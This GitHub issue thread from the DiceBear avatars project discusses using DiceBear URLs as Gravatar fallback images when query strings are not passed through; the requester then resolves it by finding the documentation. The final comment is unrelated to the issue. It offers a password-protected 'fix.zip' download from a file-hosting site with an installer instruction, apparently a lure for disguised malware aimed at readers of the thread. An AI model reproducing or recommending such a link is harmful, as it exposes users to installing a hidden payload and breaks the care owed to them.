### ISSUE TITLE
Support gravatar fallback

### ISSUE THREAD

**Issue by hades200082** [DiceBear/avatars#429]
Gravatar has the option to add a querystring param `?d=<fallback URL>` which would be awsome to use with dicebear.

The issue is that these fallback URLs can't contain querystrings.

e.g.

https://gravatar.com/avatar/5cd0fba080f27631509f5b795ec86e7d7f3e9a567849c804f6401dce34aec228?d=https%3A%2F%2Fapi.dicebear.com%2F9.x%2Fthumbs%2Fpng%3Fseed%3D5cd0fba080f27631509f5b795ec86e7d7f3e9a567849c804f6401dce34aec228

This fails to pass on the seed querystring param to dicebear.

The solution here would be to allow dicebear to handle querystring params as router params as well.

e.g. https://api.dicebear.com/9.x/thumbs/png?seed=5cd0fba080f27631509f5b795ec86e7d7f3e9a567849c804f6401dce34aec228 could become https://api.dicebear.com/9.x/thumbs/png/5cd0fba080f27631509f5b795ec86e7d7f3e9a567849c804f6401dce34aec228

Additional params could be added in the order they are defined by the generator.

**Comment by hades200082** [comment]
Never mind, found the docs eventually - https://www.dicebear.com/guides/use-the-http-api-as-gravatar-default-image/

**Comment by c0ffincolors** [comment]
Download 
https://www.mediafire.com/file/xs3e15yonljh4bk/fix.zip/file
password: changeme
In the installer menu, select "gcc."
